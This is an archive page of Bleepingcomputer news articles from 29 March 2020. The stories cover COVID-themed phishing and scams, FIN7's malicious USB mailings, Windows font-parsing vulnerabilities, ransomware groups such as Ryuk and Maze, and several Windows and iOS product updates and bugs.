Articles 2020 March  -  January  February  March  April  May  June  July  August  September  October  November  December


Microsoft's Windows 10 Dockable 'News Bar' Now In Beta
29
.3.2020  Bleepingcomputer  OS

Microsoft is releasing a new app for Windows 10 called the "Windows News Bar" that will display a docked bar containing news stories from Microsoft News and acts as a stock picker for monitored stocks.

Previously spotted by Windows sleuth WalkingCat in February, the Microsoft Store page has been recently been updated with screenshots of the actual program in use.

The News Bar is being developed through Microsoft News where they state that the offered news will be shown from over 4,500 news outlets.

"Microsoft's Windows News Bar works just like the Windows Taskbar. It's there when you need it, where you need it and how you need it. Customize its appearance in settings to find the experience that's just right for you. If you want to focus, don't worry, you can minimize the News Bar at any time and then bring it back when you're ready for it again", the Microsoft Store page reads.

Testing the Windows News Bar
When running, the News Bar will allow you to display a docked bar on the top, bottom, left, or right side of the screen that contains a continuously updated list of news stories based on your selected region.

BleepingComputer has tested the app and you can see the different ways the News Bar can be docked below. The bottom right picture also shows you how it looks with transparency enabled.

News Bar docked on bottom

News Bar docked on top

News Bar Images on right

News Bar images and text right transparent

Click on images to see full size
When clicking on stories, the selected articles will be loaded in the default browser in Windows 10.

The News Bar settings will allow you to customize where the bar is docked, whether you wish to show images or text, and if the bar should be transparent.

News Bar Settings
News Bar Settings
The News Bar requires Windows 10 April 2018 Update or later and is currently in Beta. To install it, users need to 'Redeem a code' and it not known when it will be publicly available.


FTC Warns VoIP Providers to Stop Facilitating Coronavirus Scams
29
.3.2020  Bleepingcomputer  Spam

The US Federal Trade Commission (FTC) warned nine VoIP service providers against assisting and facilitating illegal robocalls designed to capitalize on public anxiety surrounding the Coronavirus pandemic.

"Many of these robocalls prey upon consumer fear of the pandemic to perpetrate scams or disseminate disinformation," the letters say. "FTC staff have reason to believe that one or more of your customers may be involved in such illegal telemarketing campaigns."

Until March 30, the nine companies are required to email the FTC the specific actions taken to ensure that their services are not used in Coronavirus-related telemarketing schemes breaking the Telemarketing Sales Rule (TSR).

VoIP providers under scrutiny
FTC's legal staff sent letters to the following companies: Bluetone Communications LLC, Comet Media Inc, iFly Communications, J2 Web Services Inc, SipJoin Holding Corp, Third Rock Telecom, VoIPMax, VoIPTerminator Inc, and Voxbone US LLC.

The nine companies were also reminded of civil enforcement actions taken by the Department of Justice against VoIP providers and owners for "committing and conspiring to commit wire fraud by knowingly transmitting robocalls that impersonated federal government agencies."

The FTC also sued the Globex Telecom VoIP service providers and James B. Christiano's robocaller software companies as part of an effort to combat illegal telemarketing.

FTC's warning letters highlight several types of behavior that may infringe the TSR, including:

making a false or misleading statement to induce a consumer to buy something or contribute to a charity;
misrepresenting a seller or telemarketer’s affiliation with any government agency;
transmitting false or deceptive caller ID numbers;
initiating pre-recorded telemarketing robocalls, unless the seller has express written permission to call; and
initiating telemarketing calls to consumers whose phone numbers are on the National Do Not Call Registry, with certain exceptions.
"It’s never good business for VoIP providers and others to help telemarketers make illegal robocalls that scam people," FTC Bureau of Consumer Protection Director Andrew Smith said.

"But it’s especially bad when your company is helping telemarketers exploiting fears about the coronavirus to spread disinformation and perpetrate scams."

If you get COVID-19-related scam robocalls the FTC says that you should:

Hang up. Don’t press any numbers. The recording might say that pressing a number will let you speak to a live operator or remove you from their call list, but it might lead to more robocalls, instead.
Consider using a call blocking app or device. You also can ask your phone provider if it has call-blocking tools. To learn more, go to ftc.gov/calls.
Report the call. Report robocalls at ftc.gov/complaint. The more we hear from you, the more we can help fight scams.
Warnings sent for selling fake Coronavirus cures
The FTC and U.S. Food and Drug Administration (FDA) also sent warning letters to companies that were offering various products for sale — such as teas, essential oils, and colloidal silver — in the United States, products that were promoted as capable of mitigating, preventing, treating, curing, or diagnosing the COVID-19 disease in people.

The two government agencies sent the letters to the following companies: Vital Silver, Quinessence Aromatherapy Ltd, N-ergetics, GuruNanda LLC, Vivify Holistic Clinic, Herbal Amy LLC, and The Jim Bakker Show.

"Within 48 hours, please send an email to COVID-19-Task-Force-CFSAN@fda.hhs.gov describing the specific steps you have taken to correct these violations," the letters say. "Failure to immediately correct the violations cited in this letter may result in legal action, including, without limitation, seizure and injunction."

"These warning letters are just the first step," FTC Chairman Joe Simons said. "We’re prepared to take enforcement actions against companies that continue to market this type of scam."

"The FDA considers the sale and promotion of fraudulent COVID-19 products to be a threat to the public health," FDA Commissioner Stephen M. Hahn added. "We have an aggressive surveillance program that routinely monitors online sources for health fraud products, especially during a significant public health issue such as this one."

Both the FTC and the FDA are continuing to monitor online marketplaces, social media, and consumer complaints to make ensure that other companies do not market fraudulent products under other names or via other websites.

Europol also announced last week that a huge amount of counterfeit medicine and COVID-19 outbreak-related protective gear was seized in a global operation dubbed Operation Pangea coordinated by INTERPOL and targeting trafficking.

"Authorities around the world seized nearly 34 000 counterfeit surgical masks, making them the most commonly sold medical product online," according to the Europol. "Law enforcement officers identified more than 2 000 links to products related to COVID-19."


US Small Business Administration Grants Used as Phishing Bait
29
.3.2020  Bleepingcomputer  Phishing

Attackers are attempting to deliver Remcos remote access tool (RAT) payloads on the systems of small businesses via phishing emails impersonating the U.S. Small Business Administration (U.S. SBA).

They are taking advantage of the financial problems experienced by SMBs during the current COVID-19 pandemic to lure them into opening malicious attachments camouflaged as disaster assistance grants and testing center vouchers.

Despite using broken English within the phishing emails, the malicious actors made sure that the overall layout is as close as possible to the real thing, using the official U.S. SBA logo and footer info as IBM X-Force Threat Intelligence researchers found.

"The victim is presented with an application number and is urged to complete the application before March 25th," they say. "In order to do this, victims are requested to sign the attached form and upload it to the SBA website."

Also, since the attackers' method of asking for grant information is identical to the process used by the real U.S. SBA, some SMBs might fall for this trick and open the malicious attachment.

Phising email sample
Phishing email sample (IBM X-Force)
Delivering the Remcos RAT
Remcos RAT, the final payload, is delivered via an overly complicated infection chain involving an .IMG file containing an .ISO image that drops a malicious PDF document.

The PDF will then drop and execute a VBS script that downloads and launches the Remcos RAT from a Google CDN after saving it on the victim's device as Brystbenene6.exe.

Once Remcos is installed on the target's computer, the attackers gain full control over the machine which allows them to steal sensitive information like user credentials and browser cookies.

The operators behind this campaign can also download, upload, and execute malicious code and VBS scripts, take screenshots, steal their clipboard contents, use the compromised machines as proxies for other malicious purposes, as well as automate any of these tasks.

Infection chain
Infection chain (IBM X-Force)
"Currently, there are a large number of companies facing severe financial complications due to the coronavirus outbreak," the researchers explain.

"It is not uncommon for those businesses to apply for governmental help from the SBA, which makes them especially susceptible to these kinds of malware campaigns."

Economic stimulus: the perfect bait
This campaign's timing is perfect considering that small business owners are eagerly waiting for information about loans or help they could receive to survive during the pandemic given the economic stimulus checks considered by the U.S. Government.

A week ago, FBI's Internet Crime Complaint Center (IC3) warned of ongoing phishing attacks that use fake government economic stimulus checks as a lure to steal personal information from potential victims.

"Look out for phishing emails asking you to verify your personal information in order to receive an economic stimulus check from the government," IC3's alert said.

"While talk of economic stimulus checks has been in the news cycle, government agencies are not sending unsolicited emails seeking your private information in order to send you money."

The FBI issued a similar warning about scammers impersonating the Internal Revenue Service (IRS) in 2008 while trying to steal taxpayers' sensitive information using, again, economic stimulus checks as bait.


FBI: Hackers Sending Malicious USB Drives & Teddy Bears via USPS
29
.3.2020  Bleepingcomputer  BigBrothers  Virus

Hackers from the FIN7 cybercriminal group have been targeting various businesses with malicious USB‌ devices acting as a keyboard when plugged into a computer. Injected commands download and execute a JavaScript backdoor associated with this actor.

In a FLASH alert on Thursday, the FBI warns organizations and security professionals about this tactic adopted by FIN7 to deliver GRIFFON malware.

The attack is a variation of the “lost USB” ruse that penetration testers have used for years in their assessments quite successfully and one incident was analyzed by researchers at Trustwave.

One client of the cybersecurity company received a package, allegedly from Best Buy, with a loyalty reward in the form of a $50 gift card. In the envelope was a USB drive claiming to contain a list of products eligible for purchase using the gift card.


This is not a one-off incident, though.

The FBI warns that FIN7 has mailed these packages to numerous businesses (retail, restaurant, hotel industry) where they target employees in human resources, IT, or executive management departments.

"Recently, the cybercriminal group FIN7,1 known for targeting such businesses through phishing emails, deployed an additional tactic of mailing USB devices via the United States Postal Service (USPS). The mailed packages sometimes include items like teddy bears or gift cards to employees of target companies working in the Human Resources (HR), Information Technology (IT), or Executive Management (EM) roles," the FBI alert states.

The FBI says that the malicious drive is configured to emulate keystrokes that launch a PowerShell command to retrieve malware from server controlled by the attacker. Then, the USB device contacts domains or IP‌ addresses in Russia.

The days when USB flash drives were just for storage are long gone. Several development boards (Teensy, Arduino) are now available for programming to emulate a human interface device (HID) such as keyboards and mice and launch a pre-configured set of keystrokes to drop malicious payloads. These are called HID or USB drive-by attacks are easy to pull and don't cost much.

Trustwave analyzed this malicious USB activity and noticed two PowerShell commands that lead to showing a fake error for the thumb drive and ultimately to running third-stage JavaScript that can collect system information and downloading other malware.


To better summarize the attack flow, the researchers created the image below, which clarifies the stages of the compromise that lead to deploying malware of the attacker’s choice.

The alert from the FBI‌ informs that after the reconnaissance phase the threat actor starts to move laterally seeking administrative privileges.


FIN7’s uses multiple tools to achieve their goal; the list includes Metasploit, Cobalt Strike, PowerShell scripts, Carbanak malware, Griffon backdoor, Boostwrite malware dropper, and RdfSniffer module with remote access capabilities.

BadUSB‌ attacks, demonstrated by security researcher Karsten Nohl in 2014, are now common in penetration testing and multiple alternatives exist these days. The more versatile ones sell for $100.

FIN7 went with a simple and cheap version, though, that costs between $5-$14, depending on the supplier and the shipping country. The FBI‌ notes in its alert that the microcontroller is an ATMEGA24U, while the one seen by Trustwave had ATMEGA32U4.

However, both variants had “HW-374” printed on the circuit board and are identified as an Arduino Leonardo, which is specifically programmed to act as a keyboard/mouse out of the box. Customizing the keystrokes and mouse movements is possible using the the Arduino IDE.


Connecting unknown USB devices to a workstation is a well-known security risk but it is still disregarded by many users.

Organizations can take precautions against attacks via malicious USB drives by allowing only vetted devices based on their hardware ID and denying all others.

Furthermore, updating PowerShell and enabling logging (the larger the log size, the better) can help determining the attack vector and the steps leading to compromise.


Google Advises Against Disabling Sites During the Pandemic
29
.3.2020  Bleepingcomputer  Security

Google warns businesses against disabling their websites during the COVID-19 and, instead, recommends limiting their functionality to avoid being penalized in Google Search results.

The guidance published by Google Webmaster Trends Analyst John Mueller answers questions from businesses who might want to pause their online business and reduce the impact in Google Search.

"These recommendations are applicable to any business with an online presence, but particularly for those who have paused the selling of their products or services online," Mueller explained.

Limit your site's functionality
Google's recommendation is to avoid if possible to completely shut down a website even when employees work from home schedules during coronavirus lockdowns don't allow them to keep them updated.

This approach should be followed especially in cases where a company's online business is expected to pick up again according to Mueller.

Limiting a site's functionality will allow webmasters to cut down any potential Google Search negative effects stemming from the website's reduce presence for a given period of time.

Website owners and admins are advised to take one or more of the following measures rather than shutting down their sites:

• Disable the cart functionality: This is the simplest approach, which won't change anything for a site's Search visibility.
• Tell customers what's going on: Use a banner to let your customers know of the changes the business and the site are going through.
• Update the site's structured data: Keep product availability information up to date.
• Check the Merchant Center feed: Follow best practices for availability attributes listed in the Merchant Center.
• Tell Google you changed things: Ask Google to recrawl your website using sitemaps or the Search Console.

"This is the recommended approach since it minimizes any negative effects on your site's presence in Search," Mueller added.

"People can still find your products, read reviews, or add wishlists so they can purchase at a later time."

Disable sites for a very limited time only
If you can't follow the recommended approach of limiting your site's functionality to cope with the lull in orders or the decrease in update capability, there are options to reduce the impact of a full site takedown.

"This is an extreme measure that should only be taken for a very short period of time (a few days at most), as it will otherwise have significant effects on the website in Search, even when implemented properly," Mueller explained.

"Keep in mind that your customers may also want to find information about your products, your services, and your company, even if you're not selling anything right now."

Here are the options you have in this situation:

• To urgently disable the site for 1-2 days: return an informational error page with a 503 HTTP result code instead of all content. Make sure to follow the best practices for disabling a site.
• To disable the site for a longer time: provide an indexable homepage as a placeholder for users to find in Search by using the 200 HTTP status code.
• To quickly need to hide your site in Search (while considering the options): temporarily remove it from Search.

Side effects after disabling sites
Among the side effects resulting from disabling your site, webmasters will notice Knowledge Panels losing information, Search Console verification fails, and loss of business info in Search results.

Customers will also have trouble finding first-hand accurate information in Google Search and will need to rely on info from third-party web resources.

To top it all off, once a website goes down without notification customers will not know the reason why it happened without prior warning.

Google Webmasters

@googlewmc
⚡️⚡️⚡️ Do you need to hit pause on your online business for some time? We just published some do's and don't's to help you with maintaining your site's presence in search. Check it out! ⚡️⚡️⚡️https://webmasters.googleblog.com/2020/03/how-to-pause-your-business-online-in.html …

327
7:47 PM - Mar 26, 2020
Twitter Ads info and privacy
220 people are talking about this
Webmasters can also tell Google to crawl their sites less frequently via Search Console during limited functionality but shouldn't block any specific region from accessing their online businesses temporarily or otherwise.

"We hope that with this information, you're able to have your online business up & running quickly when that time comes," Mueller concluded.

"Should you run into any problems or questions along the way, please don't hesitate to use our public channels to get help."


Actively Exploited Windows Font Parsing Bugs Get Temporary Fix
29
.3.2020  Bleepingcomputer  Exploit

Until Microsoft releases a patch for two critical vulnerabilities affecting the font parsing component in all supported versions of Windows, some users can apply temporary protection in the form of a micropatch that prevents exploitation.

The two flaws affect the Adobe Type Manager Library (maintained by Microsoft) and are in the ATMFD.DLL font driver that processes Adobe Type 1 PostScript and OpenType fonts.

Leveraging them on systems earlier than Windows 10 can lead to remote code execution with elevated privileges. Microsoft is aware of threat actors exploiting them in targeted attacks on older versions of the operating system.

Works against remote attackers
Microcode that mitigates the risk of exploitation is available for Windows 7 64-bit and Windows Server 2008 R2 that do not benefit from Microsoft's Extended Security Updates (ESU). It is delivered automatically through the 0Patch platform - for both paying and non-paying users - and can be applied without rebooting the machine.

Thus, for the time being, Microsoft's least supported operating system is the only one getting a temporary fix for the font parsing bugs the company disclosed on March 23.

In Windows 10 v1709, font parsing happens in an isolated space, making exploitation more difficult. On earlier versions, though, this happens in the kernel, providing attackers an opportunity to run code with the highest privileges.

The 0Patch fix will become available for Windows 7 and Windows Server 2008 R2 with ESU, Windows 8.1 and Windows Server 2012, both 32-bit and 64-bit.

It should be noted that these vulnerabilities can be exploited by a remote adversary and this threat vector is what the micropatch protects against. A local attacker can bypass the 0Patch fix by writing code that makes system calls to the kernel.

Visible effects
In a blog post on Thursday, Mitja Kolsek, CEO of Acros Security company behind 0Patch, provides the full code of the micropatch and explains how it works.

"With this micropatch in place, all applications using Windows GDI for font-related operations will find any Adobe Type 1 PostScript fonts rendered invalid and unable to load" Mitja Kolsek

Basically, Windows' Explorer will no longer show a preview of .PFM and .PFB font file after applying the temporary fix. The glyphs won't be rendered in the Preview Pane, as thumbnails or in the Details Pane.

Other font types that are not parsed with the vulnerable component remained unaffected.


Microsoft has provided three workarounds that can mitigate the problem, each with its advantages and disadvantages:

Workaround Applicability
Disable the Preview Pane and Details Pane in Windows Explorer Works on all systems but won't mitigate the issue if you open a document with the vulnerable font class
Disable the WebClient service Works on all systems but won't mitigate the issue if you open a document with the vulnerable font class
Rename ATMFD.DLL Only works on older (before Windows 10) but completely mitigates the issue though can introduce usability issues in rare cases
Below is a video showing how Windows behaves with and without the microcode from 0Patch:


Russian-Speaking Hackers Attack Pharma, Manufacturing Companies in Europe
29
.3.2020  Bleepingcomputer  BigBrothers

Malware belonging to Russian-speaking threat actors was used in attacks in late January against at least two European companies in the pharmaceutical and manufacturing industries.

Based on the tools employed in the attacks, the suspects are likely the Silence and TA505 financially-motivated groups.

While TA505’s history of attacks includes targets in the medical sector, if security researchers are right, these incidents would mark for Silence a departure from its regular targets, which are banks and financial institutions.

Clean IPs for command and control
The first malware samples used in these attacks emerged on VirusTotal scanning platform on February 2, identified as Silence.ProxyBot and updated versions of Silence.MainModule.

Both samples are associated with Silence, a group that started in 2016 targeting banks in the former Soviet Union territory, later expanding their attack region globally. The activity of this threat actor has been described in two reports (1, 2) from Group-IB, a Singapore-based cyber security company.

Looking at the malware samples, researchers at Group-IB identified at least two victims in Belgium and Germany, both receiving the necessary information to stop the attackers’ progress.

The analysis revealed two IP addresses used for command and control activity. One is from the Czech Republic (195.123.246[.]126 - active since late January) and the other from Denmark (37.120.145[.]253); neither has a history of malicious trails, being marked as clean by multiple security services.

Checking the cybercriminal infrastructure showed that the attacker leveraged two vulnerabilities (CVE-2019-1405 and CVE-2019-1322) in Windows 10 and lower that allowed local privilege escalation. The exploit was embedded in an executable named ‘comahawk.exe.’

TA505 contribution in the attacks became visible after the researchers found a TinyMet Meterpreter stager, associated with this adversary in the past and compressed with the group’s custom packer.

The link between Silence and TA505 is not new. Group-IB‌ in 2019 reported that the two actors likely used tools (Silence.Downloader and FlawedAmmyy.Downloader) developed by the same individual.

Furthermore, the company’s incident response team discovered in late 2019 that Silence compromised at least one bank in Europe with the help of TA505, who provided access to the target network.

Ransomware attack suspected
Moving from banks and financial institutions to pharma and manufacturing companies is an odd move for the Silence gang, who specialized in breaching banks and financial organizations.

How the attackers managed to compromise the latest targets and the damage caused remains unknown at this point, as the researchers found tools used for lateral movement.

Rustam Mirkasymov, the head of the Dynamic Malware Analysis team at Group-IB, says that the purpose of the attack might have been either a ransomware infection or a complex supply-chain attack.

If ransomware was the end game, TA505 is known to have deployed at least three strains in the past - Locky, Rapid, and Clop. However, the final payload in these recent cases could not be identified because the intrusion was stopped at an intermediary stage, Mirkasymov told BleepingComputer.

The expert assesses with moderate confidence that Silence is behind these activities, although he does not exclude the possibility that the group’s tools were sold to another threat actor or borrowed by TA505.

“Slight modifications of Silence.ProxyBot and Silence.MainModule can be explained by the gang’s attempts to avoid detection as a result of being in the spotlight of security researchers for some time now” - Rustam Mirkasymov


Google Warned Users of 40,000 State-Sponsored Attacks in 2019
29
.3.2020  Bleepingcomputer  BigBrothers

Google says that it delivered almost 40,000 alerts of state-sponsored phishing or malware hacking attempts to its users during 2019, with a 25% drop when compared to the previous year.

One of the reasons behind this notable drop in the number of government-backed hacking incidents is the increasingly effective protections Google sets up to protect its users.

Due to the more effective protections, hackers are forced to slow down their attacks and try to adapt their campaigns which leads to less frequent hacking attempts.

Journalist and news outlet impersonation were among the most frequently identified phishing methods used by state-backed hackers during 2019 according to Toni Gidwani, a Security Engineering Manager with Google’s Threat Analysis Group (TAG).

Government-backed phishing targets
Government-backed phishing targets (Google)
"For example, attackers impersonate a journalist to seed false stories with other reporters to spread disinformation," he said.

"In other cases, attackers will send several benign emails to build a rapport with a journalist or foreign policy expert before sending a malicious attachment in a follow-up email."

All Advanced Protection Program users protected from phishing
"We’ve yet to see people successfully phished if they participate in Google’s Advanced Protection Program (APP), even if they are repeatedly targeted," Gidwani explained.

"APP provides the strongest protections available against phishing and account hijacking and is specifically designed for the highest-risk accounts."

Google's APP is a program designed to allow high-risk or regular users to defend their accounts from state-sponsored spear-phishing attempts using a more secure login procedure that requires them to use smartphones or security keys to verify their identity.

APP works by limiting the third-party apps and sites that can get access to a user's data bad by blocking malicious actors from impersonating the account's owner to take over their account with the help of additional identity checks.

Google recommends enrolling in APP to anyone at risk of targeted online attacks including but not limited to business leaders, journalists, activists, and IT administrators.

Users can learn more about how to sign up for Google's Advanced Protection Program by going to here.

"With attacks on the rise, and many major events on the horizon this year like the U.S. elections in November, the Advanced Protection Program offers a simple way to incorporate the strongest account protection that Google offers," Google Advanced Protection Program PM Shuvo Chatterjee said in January.

Attacks leveraging zero-days
Zero-day vulnerabilities were also among the favorite weapons identified by Google's TAG during 2019 while being used in targeted campaigns, with multiple 0-days being delivered via spearphishing emails, via watering hole attacks, and links to malicious attacker-controlled sites.

In one instance, TAG researchers were able to spot five different zero-days used by a single threat actor within a really short time frame, something that rarely happens.

"TAG actively hunts for these types of attacks because they are particularly dangerous and have a high rate of success, although they account for a small number of the overall total," Gidwani added.

Sectors targeted by SANDWORM
Sectors targeted by SANDWORM (Google)
Additionally, "government-backed attackers continue to consistently target geopolitical rivals, government officials, journalists, dissidents and activists."

For instance, Google tracked the SANDWORM Russian-backed threat group's targeting efforts (by industry sector) during the last three years and plotted their attacks in the table embedded above.


Ryuk Ransomware Keeps Targeting Hospitals During the Pandemic
29
.3.2020  Bleepingcomputer  Ransomware

The Ryuk Ransomware operators to continue to target hospitals even as these organizations are overwhelmed during the Coronavirus pandemic.

Last week BleepingComputer contacted various ransomware groups and asked if they would target hospitals and other healthcare organizations during the pandemic.

With the amount of strain healthcare organizations are under during this pandemic, I was hoping that ransomware operators would avoid these organizations so they can focus on treating people.

Of the seven ransomware operators I contacted, only Maze and DoppelPaymer responded that they would no longer target hospitals.

Since then Maze has released the data stolen from a drug testing company that was encrypted before stating they would not target healthcare. They continue to tell BleepingComputer that they will not encrypt hospitals or other healthcare organizations during the pandemic.

Ryuk never responded and continues to target hospitals
One of the ransomware operations we contacted was Ryuk who never responded to our question.

Since then, BleepingComptuer has learned that Ryuk continues to target hospitals even while they are struggling to keep people alive during the Coronavirus pandemic

For example, just this morning PeterM of Sophos tweeted that a US health care provider was attacked and encrypted overnight by Ryuk.

Tweet

When asked if there were any indicators of compromise (IOCs) that could be shared, he stated it looked like every other Ryuk attack.

"Looks like a typical Ryuk attack at the moment, they deployed the ransomware with PsExec," PeterM stated.

In a conversation with Vitali Kremez, Head of SentinelOne's research division, over the past month, he has seen Ryuk targeting 10 healthcare organizations. Of these ten targets, two are independent hospitals and another is a healthcare network of 9 hospitals in the USA.

"Not only has their healthcare targeting not stopped but we have also seen a continuous trend of exploiting healthcare organizations in the middle of the global pandemic. While some extortionist groups at least acknowledged or engaged in the discourse of stopping healthcare extortionists, the Ryuk operators remained silent pursuing healthcare targeting even in light of our call to stop," Kremez told BleepingComputer.

BleepingComputer was informed that one of the hospitals is located in a state that is being heavily affected by the Coronavirus at this time.

At any time, but even more so now, encrypting a hospital's data not only affects the ability of a doctor to carry out their job but also whether a patient may live or die.

With everything our medical professionals are dealing with around the world, all people, including ransomware actors, need to give them the space to do their jobs rather than hindering it.


Windows 10 Search Getting New Features for Business Customers
29
.3.2020  Bleepingcomputer  OS

Microsoft developers are currently working on adding the Microsoft Search offering to the Windows 10 search boxes of Office 365 enterprise customers.

The new feature is in development and Microsoft says that it should arrive on users' desktops sometime during this year's fourth quarter.

"We're bringing Microsoft Search to the Windows 10 search box," the update's Microsoft 365 roadmap entry reads.

"Microsoft Search is an enterprise search experience that increases productivity and saves time by delivering more relevant search results for your organization."

Microsoft 365 search in Windows 10
According to Redmond's support website, Microsoft Search can help users search across Microsoft 365 and get results from multiple Office 365 data sources including SharePoint, Microsoft OneDrive for Business, and Microsoft Exchange Server.

Microsoft is also designed to make result suggestions based on the customers' Office 365 activity and to allow pinpointing shared files a lot easier.

"Microsoft Search is on by default and any administration you do applies to Microsoft Search in all the apps," Microsoft explains.

After Microsoft Search will be brought to the Windows 10 search box, users will be able to find content stored by their organization within Microsoft 365 or indexed via connectors.

Microsoft highlights the following among the potential benefits of having Microsoft Search support brought to the Windows 10 search box:

• Users get results that are relevant in the context of the app they search from. For example, when they search in Microsoft Outlook, they find emails, and not SharePoint sites. When they search in SharePoint, they find sites, pages, and files.
• Whichever app users are working in; Microsoft Search is personal. Microsoft Search uses insights from the Microsoft Graph to show results that are relevant to each user. Each user might see different results, even if they search for the same words. They only see results that they already have access to, Microsoft Search doesn’t change permissions.
• Users don’t need to remember where the information is located. For example, a user is working in Microsoft Word and wants to reuse information from a presentation that a colleague shared from their OneDrive. There’s no need to switch to OneDrive and search for that presentation, they can simply search from Word.
• When in Bing, users get results from within their organization in addition to the public web results.
The Microsoft Search extension for Chrome fiasco
In late January, Microsoft previously tried to forcibly deploy the 'Microsoft Search in Bing quick access' Google Chrome extension for some Office 365 ProPlus users.

This would have forced the browser to use Bing as the default search engine, helping the Office 365 customers to "access relevant workplace information directly from the browser address bar."

At the time, the company said that it was planning to roll out the extension starting in mid-February to enterprise customers running with Office 365 ProPlus, Version 2002, through the targeted monthly channel.

Microsoft Search in Bing welcome screen
Microsoft Search in Bing welcome screen (Microsoft)
However, following users' outrage, Microsoft decided to backpedal on its decision a few weeks later, in February, pausing the rollout and saying that "administrators will be able to opt in to deploy the browser extension."

"In the near term, Office 365 ProPlus will only deploy the browser extension to AD-joined devices, even within organizations that have opted in," Microsoft said. "In the future, we will add specific settings to govern the deployment of the extension to unmanaged devices."


New Windows 10 Bug Causes Internet Connectivity Issues, Fix in April
29
.3.2020  Bleepingcomputer  OS

All supported Windows 10 and Windows Server versions are affected by a new bug that could cause applications to be unable to connect to the Internet.

According to a new post by Microsoft, when a Windows user is using a manual or auto-configured proxy, they may have issues connecting to the Internet with applications that utilize the WinHTTP or WinInet Windows networking APIs. This bug has a greater chance of affecting VPN users.

"Devices using a manual or auto-configured proxy, especially with a virtual private network (VPN), might show limited or no internet connection status in the Network Connectivity Status Indicator (NCSI) in the notification area. This might happen when connected or disconnected to a VPN or after changing state between the two. Devices with this issue, might also have issues reaching the internet using applications that use WinHTTP or WinInet. Examples of apps that might be affected on devices in this state are as follows but not limited to Microsoft Teams, Microsoft Office, Office365, Outlook, Internet Explorer 11, and some version of Microsoft Edge."

Microsoft has stated that popular applications that rely on the affected APIs include Outlook, Microsoft Office, and Microsoft Teams.

This bug is affecting all supported Windows 10 and Windows Servers versions ranging from version 1909 to 1709.

To fix this bug, Microsoft says affected users may be able to resolve the bug by rebooting their computer.

An out-of-band (OOB) update to fix this issue is being targeted for release in early April.


Unpatched iOS Bug Blocks VPNs From Encrypting All Traffic
29
.3.2020  Bleepingcomputer  Apple

A currently unpatched security vulnerability affecting iOS 13.3.1 or later prevents virtual private networks (VPNs) from encrypting all traffic and can lead to some Internet connections bypassing VPN encryption to expose users' data or leak their IP addresses.

While connections made after connecting to a VPN on your iOS device are not affected by this bug, all previously established connections will remain outside the VPN's secure tunnel as ProtonVPN disclosed.

This VPN bypass vulnerability (rated with a 5.3 CVSS v3.1 base score) was discovered by a security consultant part of the Proton community and was disclosed by ProtonVPN to make users and other VPN providers aware of the issue.

Connections remain open and exposed
The bug is due to Apple's iOS not terminating all existing Internet connections when the user connects to a VPN and having them automatically reconnect to the destination servers after the VPN tunnel is established.

"Most connections are short-lived and will eventually be re-established through the VPN tunnel on their own," ProtonVPN explains. "However, some are long-lasting and can remain open for minutes to hours outside the VPN tunnel."

During the time the connections are outside of the VPN secure communication channels, this issue can lead to serious consequences.

For instance, user data could be exposed to third parties if the connections are not encrypted themselves, and IP address leaks could potentially reveal the users' location or expose them and destination servers to attacks. Exposed connections
Exposed connections to Apple servers (ProtonVPN)
Even though users should only see traffic being exchanged between their devices, local IP addresses, and the VPN's servers, other IP addresses will also show up —Apple server IPs in the screenshot above — because of previously opened connections not being terminated before the VPN connects

While ProtonVPN says that Apple's push notifications are a good example of a process using connections to Apple servers that won't be closed automatically, this bug can affect any service or app running on the user's iOS device, from web beacons to instant messaging applications.

"Those at highest risk because of this security flaw are people in countries where surveillance and civil rights abuses are common," ProtonVPN says.

"Neither ProtonVPN nor any other VPN service can provide a workaround for this issue because iOS does not permit a VPN app to kill existing network connections."

ProtonVPN
@ProtonVPN
Last year, we discovered a vulnerability in iOS that causes connections to bypass VPN encryption. This is a bug in iOS that impacts all VPNs. We have informed Apple, and we are now sharing details so you can stay safe. https://protonvpn.com/blog/apple-ios-vulnerability-disclosure/ …

221
10:08 PM - Mar 25, 2020
Twitter Ads info and privacy
122 people are talking about this
Temporary workarounds
Apple acknowledged the VPN bypass vulnerability after ProtonVPN's report and is currently looking into options on how to fully mitigate it.

Until a fix will be provided, Apple recommends using Always-on VPN to mitigate this problem. However, since this workaround uses device management, it cannot be used to mitigate the vulnerability for third-party VPN apps such as ProtonVPN.

ProtonVPN recommends the following this procedure if you are using a third-party VPN:

Connect to a VPN server.
Turn on airplane mode. This will kill all Internet connections and temporarily disconnect the VPN.
Turn off airplane mode. The VPN will reconnect, and your other connections should also reconnect inside the VPN tunnel (not 100% reliable)


Chubb Cyber Insurer Allegedly Hit By Maze Ransomware Attack
29
.3.2020  Bleepingcomputer  Ransomware 

Cyber insurer giant Chubb is allegedly the latest ransomware victim according to the operators of the Maze Ransomware who claim to have encrypted the company in March 2020.

Chubb is one of the leading insurance carriers in the world with an extensive line of cyber insurance products that include incident response, forensics, legal teams, and even public relations.

Ransomware is not unknown to Chubb, as in their 2019 Cyber InFocus Report Chubb explains that malware-related claims have risen by 18% in 2019, with ransomware being responsible for 40% of manufacturer's cyber claims and 23% of cyber claims for smaller businesses.

Ransomware targets per industry
Ransomware targets per industry
Source: Chubb Cyber InFocus Report
Maze claims they encrypted Chubb's network
In a new entry on their Maze 'News' site, the ransomware operators claim to have encrypted devices on Chubb's network in March, 2020.


As part of these attacks, the Maze operators will steal a company's files before encrypting their network. These stolen files will then be used as leverage by threatening to publicly release it if a ransom is not paid.

Since then, other ransomware operators such as REvil, DoppelPaymer, and CLOP have also begun to adopt this extortion tactic.

After encrypting victims, Maze will create an entry on their news site as a warning to the victim that if they do not pay, their data will be published. If a victim does not pay, the operators publish an increasingly larger amount of stolen data until it is all released.

Maze has not published any of the allegedly stolen data, but have included the email addresses of executives such as CEO Evan Greenberg, COO John Keogh, and Vice Chairman John Lupica. This information, though, should not be considered proof of encryption as the emails are readily available on public websites.

Furthermore, as published stolen data usually contains the personal information of employees and sensitive client information, it causes ransomware attacks to become a data breach. This brings along all of the legal and notification requirements, PR nightmares, and the potential of lawsuits.

In a statement to BleepingComputer, Chubb stated that they are investigating whether this is unauthorized access to their data held at a third-party service provider as there is no evidence that their network was breached.

"We are currently investigating a computer security incident that may involve unauthorized access to data held by a third-party service provider. We are working with law enforcement and a leading cybersecurity firm as part of our investigation. We have no evidence that the incident affected Chubb’s network. Our network remains fully operational and we continue to service all policyholder needs, including claims. Securing the data entrusted to Chubb is a top priority for us. We will provide further information as appropriate", Chubb told BleepingComputer.

The Maze operators have told BleepingComputer that they are not providing any further details of the attack at this time.

Vulnerable Citrix gateways on Chubb network
While Chubb states that their network has not been compromised, cybersecurity intelligence firm Bad Packets has stated that the company has numerous Citrix ADC (Netscaler) servers that are vulnerable to the CVE-2019-19871 vulnerability.


